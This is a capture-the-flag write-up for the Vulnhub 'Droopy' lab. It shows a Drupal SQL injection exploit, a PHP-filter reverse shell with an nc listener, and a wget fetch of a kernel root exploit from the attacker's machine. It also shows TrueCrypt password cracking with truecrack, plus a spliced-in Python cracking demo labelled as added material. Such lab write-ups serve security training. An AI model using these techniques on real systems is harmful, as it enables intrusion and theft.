tick.Tack

Droopy: v0.2

Droopy: v0.2 from Vulnhub


Nmap scan result

# Nmap 6.49BETA4 scan initiated Sun Jun 19 08:07:56 2016 as: nmap -Pn -T5 -o nmap_result 192.168.0.111
Warning: 192.168.0.111 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.0.111
Host is up (0.00026s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:48:50:BF (Cadmus Computer Systems)

Limited Shell

The website on port 80 is based on Drupal 7. First I tried scanning it with droopescan.

# droopescan scan drupal -u http://192.168.0.112/ -t 8
[+] No themes found.

[+] Possible interesting urls found:
    Default changelog file - http://192.168.0.112/CHANGELOG.txt

[+] Possible version(s):
    7.30

[+] No plugins found.

[+] Scan finished (0:00:04.024569 elapsed)

Then I found an SQL injection exploit for Drupal Core <= 7.32. Modifying the $url in the script to point at the target is necessary before running it. After firing it up, we receive the success message.

# php 34993.php
Success! Log in with username "admin" and password "admin" at http://192.168.0.112/user/login

Now let’s verify that the exploit worked by logging in with those credentials.

Okay! We’re logged in as admin. Time to search for further vulnerabilities.

By browsing the Modules page, there’s an interesting module called ‘PHP filter’ which might be useful for getting a reverse shell.

Let’s tick its checkbox and save the configuration. Then go to Add content -> Basic page, put the reverse shell code in the Body textbox, and finally set the Text format to PHP code.

Before pressing the Preview button, make sure you already have netcat listening.

# nc -lvp 6666
listening on [any] 6666 ...
192.168.0.112: inverse host lookup failed: Unknown host
connect to [192.168.0.105] from (UNKNOWN) [192.168.0.112] 49779
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
 09:16:53 up 4 min,  0 users,  load average: 0.02, 0.11, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Privilege Escalation

By doing some enumeration, we can see the system is Ubuntu 14.04 and the kernel version is 3.13.0-43-generic.

# uname -a
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
# cat /etc/os-release
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"

There’s an exploit that will give us root privileges. All you need to do is download it, compile it into an executable, then run it.

$ cd /tmp
$ wget http://192.168.0.105:8000/37292.c -O exp.c
--2016-06-21 09:18:44--  http://192.168.0.105:8000/37292.c
Connecting to 192.168.0.105:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/plain]
Saving to: 'exp.c'

     0K .....                                                 100% 1.09G=0s

2016-06-21 09:18:44 (1.09 GB/s) - 'exp.c' saved [5123/5123]

$ gcc -o exp.c exp
gcc: error: exp: No such file or directory
gcc: fatal error: no input files
compilation terminated.
$ gcc -o exp exp.c
$ ./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# 

Capture the flag

# ls -al /root
total 5148
drwx------  3 root root    4096 Apr 12 13:51 .
drwxr-xr-x 22 root root    4096 Apr 10 12:02 ..
-rw-r--r--  1 root root    3106 Feb 20  2014 .bashrc
drwx------  2 root root    4096 Apr 10 12:02 .cache
-rw-r--r--  1 root root     140 Feb 20  2014 .profile
-rw-------  1 root root    3771 Apr 11 13:11 .viminfo
-rw-r--r--  1 root root 5242880 Apr 12 13:18 dave.tc

When I got root privileges, I thought this boot2root machine was done. But oddly there is no flag file in the root directory; only a large data file called dave.tc is found. So I went back to Vulnhub and checked the description again.

It tells us to ‘read other people’s mail’, and there is a mail under /var/mail.

# cat /var/mail/www-data
From Dave <dave@droopy.example.com> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <dave@droopy.example.com>
Subject: rockyou with a nice hat!
Message-ID: <730262568@example.com>
X-IMAP: 0080081351 0000002016
Status: NN

George,

   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave

So dave.tc is an encrypted file whose password is not longer than 11 characters. The ‘.tc’ extension suggests the file is a TrueCrypt volume, so I will try to crack it with truecrack.

The second hint says we might need the rockyou wordlist. Since we know the password is not longer than 11 characters, I will make a custom wordlist first to save some time.

# cat rockyou.txt | awk 'length($0)<12' > my_wordlist
# cat my_wordlist | wc -l
12770785

There are too many lines in this file; I don’t think it is worth running the whole wordlist. So I checked the mail again and decided to use ‘academy’ and ‘Academy’ to make the wordlists smaller.

root@kali:~/Security/droopy# grep academy my_wordlist > academy_wordlist
root@kali:~/Security/droopy# cat academy_wordlist | wc -l
94
root@kali:~/Security/droopy# grep Academy my_wordlist > Academy_wordlist
root@kali:~/Security/droopy# cat Academy_wordlist | wc -l
5

Now I have two smaller wordlists, so let’s try them with truecrack.

root@kali:~/Security/droopy# truecrack -t dave.tc -w academy_wordlist
TrueCrack v3.0
Website: http://code.google.com/p/truecrack
Contact us: infotruecrack@gmail.com
No found password
Total computations:     "94"
root@kali:~/Security/droopy# truecrack -t dave.tc -w Academy_wordlist
TrueCrack v3.0
Website: http://code.google.com/p/truecrack
Contact us: infotruecrack@gmail.com
No found password
Total computations:     "5"

It ran fast, but both of them failed.

I couldn’t find any other method to crack TrueCrypt files. But I noticed something in the truecrack help:

-k --key <ripemd160 | sha512 | whirlpool>      Key derivation function (default ripemd160).

Maybe dave.tc is encrypted with a different key derivation function. So I ran the command again with ‘-k sha512’.

# truecrack -t dave.tc -w academy_wordlist -k sha512
TrueCrack v3.0
Website: http://code.google.com/p/truecrack
Contact us: infotruecrack@gmail.com
Found password:         "etonacademy"
Password length:        "12"
Total computations:     "40"
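The two lessons from this part, reducing the wordlist with the mail’s constraints and trying every key derivation function instead of only the tool’s default, as an added example that is not part of the original post. It uses TrueCrypt’s real PBKDF2 parameters (64-byte salt, 2000 iterations for RIPEMD-160, 1000 for SHA-512 and Whirlpool, 64 derived bytes) but substitutes an HMAC tag for the AES-XTS header decryption; the sample wordlist and the volume header are constructed for the demo.

```python
import hashlib
import hmac
from typing import Iterable, Optional, Sequence, Tuple

# TrueCrypt's PBKDF2 parameters for a normal volume: a 64-byte salt at the start of
# the file, one iteration count per hash, 64 derived bytes (two AES-256 keys for XTS).
SALT_LEN = 64
KEY_LEN = 64
KDF_ITERATIONS = {"ripemd160": 2000, "sha512": 1000, "whirlpool": 1000}
MAGIC = b"TRUE"  # in a real volume the right key decrypts this ASCII magic at offset 64

def derive_header_key(password: str, salt: bytes, kdf: str) -> bytes:
    return hashlib.pbkdf2_hmac(kdf, password.encode(), salt, KDF_ITERATIONS[kdf], KEY_LEN)

def filter_candidates(words: Iterable[str], max_len: int = 11, hint: str = "academy") -> list:
    """The mail's constraints: not longer than 11 characters and tied to an academy
    (case-insensitive, so one pass covers both the 'academy' and 'Academy' greps)."""
    return [w for w in words if len(w) <= max_len and hint in w.lower()]

def make_demo_header(password: str, kdf: str, salt: bytes) -> bytes:
    """Constructed stand-in for salt || AES-XTS(header): an HMAC tag over the magic."""
    key = derive_header_key(password, salt, kdf)
    return salt + hmac.new(key, MAGIC, "sha256").digest()

def header_opens(header: bytes, password: str, kdf: str) -> bool:
    salt, tag = header[:SALT_LEN], header[SALT_LEN:]
    try:
        key = derive_header_key(password, salt, kdf)
    except ValueError:  # this OpenSSL build lacks the hash (ripemd160/whirlpool often do)
        return False
    return hmac.compare_digest(tag, hmac.new(key, MAGIC, "sha256").digest())

def crack_volume(header: bytes, candidates: Sequence[str], kdfs: Sequence[str]) -> Optional[Tuple[str, str]]:
    """Try every (KDF, candidate) pair, i.e. one truecrack run per -k value."""
    for kdf in kdfs:
        for pw in candidates:
            if header_opens(header, pw, kdf):
                return pw, kdf
    return None

# Constructed sample wordlist and a demo volume locked with SHA-512, not truecrack's default.
SAMPLE_WORDS = ["123456", "academy", "etonacademy", "etonacademy123", "Academy1", "navalacademy"]
DEMO_HEADER = make_demo_header("etonacademy", "sha512", bytes(range(SALT_LEN)))

if __name__ == "__main__":
    cands = filter_candidates(SAMPLE_WORDS)
    print("candidates:", cands)  # ['academy', 'etonacademy', 'Academy1']
    print("default KDF only:", crack_volume(DEMO_HEADER, cands, ["ripemd160"]))  # None
    print("every KDF:", crack_volume(DEMO_HEADER, cands, list(KDF_ITERATIONS)))  # ('etonacademy', 'sha512')
```

The same password never opens the volume under the wrong KDF, which is exactly why the first two truecrack runs reported "No found password" even though the wordlist was right.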

We got the password! All we need to do now is find a tool that can open the TrueCrypt volume. After some googling, I found that cryptsetup supports TrueCrypt volumes via --type tcrypt.

# cryptsetup open --type tcrypt ./dave.tc davetc
Enter passphrase:
# mkdir /media/davetc
# mount /dev/mapper/davetc /media/davetc
# cd /media/davetc
# ls -alR
.:
total 20
drwxr-xr-x 6 root root  1024 Apr 12 20:00 .
drwxr-xr-x 4 root root  4096 Jun 21 21:49 ..
drwxr-xr-x 2 root root  1024 Apr 12 19:54 buller
drwx------ 2 root root 12288 Apr 12 19:53 lost+found
drwxr-xr-x 2 root root  1024 Apr 12 19:58 panama
drwxr-xr-x 3 root root  1024 Apr 12 20:02 .secret

./buller:
total 11
drwxr-xr-x 2 root root 1024 Apr 12 19:54 .
drwxr-xr-x 6 root root 1024 Apr 12 20:00 ..
-rw-r--r-- 1 root root 8393 Oct  5  2013 BullingdonCrest.jpg

./lost+found:
total 13
drwx------ 2 root root 12288 Apr 12 19:53 .
drwxr-xr-x 6 root root  1024 Apr 12 20:00 ..

./panama:
total 52
drwxr-xr-x 2 root root  1024 Apr 12 19:58 .
drwxr-xr-x 6 root root  1024 Apr 12 20:00 ..
-rw-r--r-- 1 root root 49257 Jun 16  2014 shares.jpg

./.secret:
total 64
drwxr-xr-x 3 root root  1024 Apr 12 20:02 .
drwxr-xr-x 6 root root  1024 Apr 12 20:00 ..
-rw-r--r-- 1 root root 61118 Feb 25 16:57 piers.png
drwxr-xr-x 2 root root  1024 Apr 12 20:16 .top

./.secret/.top:
total 3
drwxr-xr-x 2 root root 1024 Apr 12 20:16 .
drwxr-xr-x 3 root root 1024 Apr 12 20:02 ..
-r-------- 1 root root  872 Apr 12 20:16 flag.txt

Now we see the flag here.

# cat ./.secret/.top/flag.txt

################################################################################
#   ___ ___  _  _  ___ ___    _ _____ _   _ _      _ _____ ___ ___  _  _  ___  #
#  / __/ _ \| \| |/ __| _ \  /_\_   _| | | | |    /_\_   _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ |   / / _ \| | | |_| | |__ / _ \| |  | | (_) | .` |\__ \ #
#  \___\___/|_|\_|\___|_|_\/_/ \_\_|  \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
#                                                                              #
################################################################################

Firstly, thanks for trying this VM. If you have rooted it, well done!

Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
                                                                    --knightmare

Finally, don’t forget to unmount and close the volume.

# umount /media/davetc
# cryptsetup close davetc